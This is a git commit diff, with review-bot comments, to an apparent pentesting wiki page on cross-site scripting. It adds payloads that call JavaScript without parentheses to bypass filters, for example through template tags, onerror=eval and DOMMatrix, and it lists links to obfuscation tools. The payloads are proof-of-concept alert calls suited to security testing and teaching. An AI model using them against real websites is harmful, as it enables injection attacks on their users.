GitBook: [#3501] No subject
This commit is contained in:
parent
c6405d9dcc
commit
fd7e8de8d4
@ -201,7 +201,7 @@ Some **examples**:
When your input is reflected **inside the HTML page** or you can escape and inject HTML code in this context the **first** thing you need to do if check if you can abuse `<` to create new tags: Just try to **reflect** that **char** and check if it's being **HTML encoded** or **deleted** of if it is **reflected without changes**. **Only in the last case you will be able to exploit this case**.\
For this cases also **keep in mind** [**Client Side Template Injection**](../client-side-template-injection-csti.md)**.**\
_**Note: A HTML comment can be closed using\*\*\*\*\*\*\*\***** ****`-->`**** ****or \*\*\*\*****`--!>`**_
_**Note: A HTML comment can be closed using**** ****`-->`**** ****or**** ****`--!>`**_
In this case and if no black/whitelisting is used, you could use payloads like:
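Review bot: the replacement note line still carries `**** ****` bold-marker residue from the GitBook export (the old line had `\*\*\*\*\*\*\*\*****`, the new one has `**** ****` around `-->` and `--!>`), so it will still render with stray asterisks or empty bold spans; write it as `_**Note: An HTML comment can be closed using `-->` or `--!>`**_`. While this paragraph is being touched, the surrounding context has typos worth fixing in the same commit: "the first thing you need to do if check if you can abuse" should read "is to check whether you can abuse", "deleted of if it is reflected" should be "deleted, or if it is reflected", and "For this cases" should be "For these cases".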
@ -595,12 +595,23 @@ eval(8680439..toString(30))(983801..toString(36))
**JavaScript without parentheses**
```javascript
````javascript
alert`1`
<img src=x onerror="window.onerror=eval;throw'=alert\x281\x29'">
eval.call`${'alert\x2823\x29'}`
eval.apply`${[`alert\x2823\x29`]}`
```
[].sort.call`${alert}1337`
[].map.call`${eval}\\u{61}lert\x281337\x29`
throw onerror=alert,1337
Function`x${'alert\x281337\x29'}x```
'alert\x281337\x29'instanceof{[Symbol['hasInstance']]:eval}
valueOf=alert;window+''
x=new DOMMatrix;matrix=alert;x.a=1337;location='javascript'+':'+x
// or any DOMXSS sink such as location=name
window.name='javascript:alert(1)'
Reflect.apply.call`${navigation.navigate}${navigation}${[name]}`
````
* [https://github.com/RenwaX23/XSS-Payloads/blob/master/Without-Parentheses.md](https://github.com/RenwaX23/XSS-Payloads/blob/master/Without-Parentheses.md)
* [https://portswigger.net/research/javascript-without-parentheses-using-dommatrix](https://portswigger.net/research/javascript-without-parentheses-using-dommatrix)
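Review bot: moving the fence from three to four backticks is the right fix here, because the added `Function` template-tag payload (`Function`x${'alert\x281337\x29'}x` followed by three backticks) ends in a run of three backticks that would close a three-backtick fence early; the new closing fence of four backticks matches it, so the block now renders whole. Two smaller points in the added payloads: `window.name='javascript:alert(1)'` on its own does nothing, and the comment above it (`// or any DOMXSS sink such as location=name`) implies a `location=name` step that is not shown, so either add that line or mark the `window.name` line as the setup half of the pair; and `Reflect.apply.call`${navigation.navigate}${navigation}${[name]}`` relies on the Navigation API, which is not available in every browser, so a comment noting the browser requirement would help readers who find it silently fails.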
@ -807,7 +818,7 @@ with(this)
### Obfuscation & Advanced Bypass
* **Different obfuscations in one page:** [**https://aem1k.com/aurebesh.js/**](https://aem1k.com/aurebesh.js/) \*\*\*\*
* **Different obfuscations in one page:** [**https://aem1k.com/aurebesh.js/**](https://aem1k.com/aurebesh.js/)
* [https://github.com/aemkei/katakana.js](https://github.com/aemkei/katakana.js)
* [https://ooze.ninja/javascript/poisonjs](https://ooze.ninja/javascript/poisonjs)
* [https://javascriptobfuscator.herokuapp.com/](https://javascriptobfuscator.herokuapp.com)
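Review bot: dropping the trailing `\*\*\*\*` from the aurebesh.js bullet is correct; it rendered as literal asterisks after the link. Style point for the same list: the bullets are inconsistent (one carries a bold description, the rest are bare URLs), and the last entry's link text `https://javascriptobfuscator.herokuapp.com/` has a trailing slash that its target lacks; both harmless, but worth aligning while the list is being edited.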
@ -816,6 +827,7 @@ with(this)
* More sofisticated JSFuck: [https://medium.com/@Master\_SEC/bypass-uppercase-filters-like-a-pro-xss-advanced-methods-daf7a82673ce](https://medium.com/@Master\_SEC/bypass-uppercase-filters-like-a-pro-xss-advanced-methods-daf7a82673ce)
* [http://utf-8.jp/public/jjencode.html](http://utf-8.jp/public/jjencode.html)
* [https://utf-8.jp/public/aaencode.html](https://utf-8.jp/public/aaencode.html)
* [https://portswigger.net/research/the-seventh-way-to-call-a-javascript-function-without-parentheses](https://portswigger.net/research/the-seventh-way-to-call-a-javascript-function-without-parentheses)
```javascript
//Katana
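Review bot: the added PortSwigger "seventh way to call a JavaScript function without parentheses" link belongs with the "JavaScript without parentheses" section, where the sibling DOMMatrix article from the same research series is already listed, rather than in the obfuscation list; add it there or cross-reference it. Two context-line nits in this hunk: "sofisticated" should be "sophisticated", and the `//Katana` comment that opens the code block does not match the `katakana.js` link two bullets above it, so one of the two spellings looks like a typo.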